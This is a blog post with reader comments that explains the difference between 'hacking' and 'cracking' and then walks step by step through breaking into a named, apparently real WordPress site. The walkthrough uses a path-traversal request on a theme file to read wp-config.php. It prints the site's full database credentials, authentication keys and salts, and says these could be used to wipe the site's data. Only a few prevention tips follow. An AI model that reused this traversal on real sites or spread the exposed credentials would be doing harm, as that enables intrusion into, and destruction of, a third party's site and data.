How do you hack WordPress?

This can be done in MANY different ways, depending on what you mean by “hack” and what you are trying to accomplish.  Lets clear up what the work hack actually means.  A “hacker” is someone who is a clever programmer, a “hack” is a clever solution to a programming problem, and “hacking” is the act of doing it.  By this definition, when you ask how to hack WordPress, you are saying that you  have a programming problem that needs to be solved in a clever way.

Unfortunately the term “hacking” has been confused with “cracking”. Cracking is the act of breaking into a computer system.  A “Cracker” is typically a kind of hacker who has proficient technical knowledge in security systems.  They will use this knowledge to break through a computers system.

So what are you wanting to do? Hack or Crack?

If you are wanting to hack WordPress, you are wanting to modify it to do something that it is not offering already.  An example of this might be that you wish to have a live chat system.  By creating this system and integrating it into WordPress, you have technically hacked it.  Think plugins for example.  They were created outside of WordPress but in a way that lets them be added, giving additional functionality to the web platform.

By the most popular use of the term hack, I will assume you are actually wanting to crack WordPress.  So how do you do this? How can you break into someones WordPress sight?

Cracking WordPress

The following steps can be used for good or evil.  It is up to you to decide how they are used.

  1. Find a WordPress based site that you want to Crack. I will use: http://apostolicclassics.net/ .
  2. Now you need to find vulnerable parameters on the site. Go to the site, then right click on page and hit view source.  This shows you the actual code of the website.
  3.  One of the parameters is showing inner directories: http://apostolicclassics.net/wp-content/themes/eleven40/style.css?ver=2.4.2 .
  4. This means the site has ab LFD(Local File Disclosure) vulnerability, allowing you to see the websites directory content.
  5.  You can now use software such as Acunetix Scanner to find a vulnerable path.
  6. Start by getting a list of all their installed plugins.  Plugins and themes are the first places to start looking for exploits. Keep this in mind when you are installing these on your own site. Do your research!
  7. Google search exploits followed by the plugin names in google to determine if the plugin has any known security issues.
  8. On this site they have a plugin called wp-mobile-edition. Looking this up in google shows that there are know known exploits for this plugin!
  9.  Another route is the themes they are using. Inside their mTheme-unus, there is a css.php file: http://apostolicclassics.net/wp-content/themes/mTheme-Unus/css/css.php
  10. Now I try to access other files through this by appending to the url string. After a few tries I landed on appending ?files=../../../../wp-config.php to the URL. The whole url now looks like: http://apostolicclassics.net/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php .
  11. We now can see what is inside their wp-config file!:
  12. <?phpdefine('FLYWHEEL_CONFIG_DIR', dirname(__FILE__) .
     '/flywheel-config');define('FLYWHEEL_PLUGIN_DIR', FLYWHEEL_CONFIG_DIR .
     '/plugins');define('FLYWHEEL_DEFAULT_PROTOCOL', 'http://');define('WPMU_PLUGIN_DIR', dirname(__FILE__) .
     '/wp-content/mu-plugins');define('WPMU_PLUGIN_URL', '/wp-content/mu-plugins');define('FS_METHOD', 'direct');define('WP_POST_REVISIONS',10);define('WP_MEMORY_LIMIT', '200M')
    ;define('DB_NAME', 'wp4735');define('DB_USER', 'wp4735');define('DB_PASSWORD', 'Pl5Gznca3hLPkD8xidViSRcRolxMTj');define('DB_HOST', '127.0.0.1');define('DB_CHARSET', 'utf8')
    ;define('DB_COLLATE', '');$table_prefix= 'wp_';define('AUTH_KEY', 'T/k#-=bjczXG-D-^|~l8ST+{%*e*8jtj<MdM#U8@0~AOmBzRX-dvZ^$)pN{=<b[7')
    ;define('SECURE_AUTH_KEY','XVBzs%OWCST{ex`K6Z _ CXQV=o]Nw.o:I_X_vI1q46!(5%QB-a}@HEd;AHN>Pnm');define('LOGGED_IN_KEY','DzMfZQ-Y7-kQwr4=|1,gl=`-BvH_9lna!@1}a_D(yOSQll+w3mP$$N?+Y5%q>yYz')
    ;define('NONCE_KEY','I_^{yONUF(+v0c^`Mqp3(s^G.t|eJr/,>yEnUXTP7WE_QQF5=z:6r+9)s,kx{Q<>');define('AUTH_SALT','U.+]gY[C_JBE*-~g/Grjnhadi`[/mEacbZ%l&?[NX9JPm7B+{<< +}blX54jT@b+')
    ;define('SECURE_AUTH_SALT', 'p>P>;GO=Dc;-xdZ*AY`-qx[_YnDNI`ikdyXj_GGS-ZH!ro}UasMD_nS$L$:g#; O')
    ;define('LOGGED_IN_SALT', '[e@Du dCZ<0ND-l>F}^-hqq(edkMJ6[=Bv3R*(|bA?X_ygP:u1+EaG%To%EW WMf')
    ;define('NONCE_SALT', 'J52fOcjw3`p;/#&@T=6W>]Ev4_ -.aw1=PJ(JM|t=0m~[0)|!S;&%JumJR._$94?');define('WPLANG', '');define('WP_DEBUG', false)
    ;define('WP_CACHE', false);define('WP_AUTO_UPDATE_CORE', false);if ( !defined('ABSPATH') )define('ABSPATH', dirname(__FILE__) . '/')
    ;if ( array_key_exists('HTTP_X_FORWARDED_PROTO', $_SERVER) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https' )$_SERVER['HTTPS']='on';require_once(ABSPATH . 'wp-settings.php');
  13. If you look at the data, you can see that we just found out some very important information:

The Database Username: wp4735

The Database Password: Pl5Gznca3hLPkD8xidViSRcRolxMTj

The Database Hostname: 127.0.0.1

With this information, I can access their database.  I could delete all their data, or corrupt it. I could populate it with my own data. If they do not backup their database, they could potentially loose all their hundreds of posts if i where malicious! Keep in mind that this process worked in this instance, but depending on the technology used, this process will change dramatically.  That is why having an intensity knowledge of these technologies is important to be a good hacker or cracker.

So why am I teaching you this? Well because this knowledge can be used for good, or for bad.  It is better that you understand how this works so you can better prevent it from happening to you!

I have had WordPress sites and forums get cracked before and had all my data deleted.  This is a really bad day! So how can you prevent this from happening to your site?

  1. Research any theme or plugin you use for known security exploits.
  2.  Keep WordPress, themes, and plugins up to date.
  3.  Make sure you have a plugin that will automatically backup your WHOLE site and database frequently to another location.

 

9 thoughts on “How do you hack WordPress?

  1. How do you find a plugin to do the backup? Maybe you could tell us that next week. I was wondering about adding PayPal as a plugin but thought it might be crackable. Does an SSL certificate solve all that?

    1. WordPress is very popular CMS, making it the victim of many different types of attacks. Nothing is ever perfectly secure but you can expect someone will eventually try and mess with your site. Best not to leave doors wide open for them!

  2. Very interesting and scary to think about. It is good to be informed and to have a plan in case something like this were to happen. Do you have any recommendations for plugins that will automatically backup your whole site and database?

  3. Hi Micah,

    I’m not sure how I feel about this information being so openly shared, but you make a great point to prioritize the security of any plug-ins to make sure they are up to date, having a back-up system in place and being diligent about your site’s security. If this is hacking knowledge is so readily available, we should all invest in security strategies.

    Thanks for bringing this to our attention.

  4. Thanks for the breakdown on Hacking and Cracking. I wasn’t using the right terms when talking about them. I thought Hacking and Cracking were the same. Good to know, never hurts to be prepared for hackers.

Leave a Reply

Your email address will not be published. Required fields are marked *